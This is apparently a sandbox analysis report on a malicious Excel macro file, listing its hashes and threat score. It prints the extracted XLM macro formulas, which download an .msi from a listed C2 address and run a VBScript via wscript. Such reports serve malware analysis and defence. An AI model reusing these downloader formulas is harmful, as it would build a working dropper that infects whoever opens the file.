Overview

overview

10

Static

static

10

c71052a077...6.xlsm

windows7-x64

10

c71052a077...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    c71052a07793e02530aec47a6d64d2c6

  • Size

    6KB

  • MD5

    c71052a07793e02530aec47a6d64d2c6

  • SHA1

    169a258eb0f9dbf65aae98240f208e3d5a65cf8a

  • SHA256

    1fc22af3551c93d70a6e54d64efa07ad81e85c7d8212547a9e8c2ec93671fce8

  • SHA512

    ef823d1a4f9a3fa65cbb2f19bad29f890f3eb9b9f1e00d91b6f3528d9c975cc4a39cd9e0297cfdf9a780b608e1b58beb698b18177d5f54e64941319084431253

  • SSDEEP

    192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ypJL+GTf:N+uYM2wY1FYZb98ypJZTf

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • c71052a07793e02530aec47a6d64d2c6
    .xlsm office2007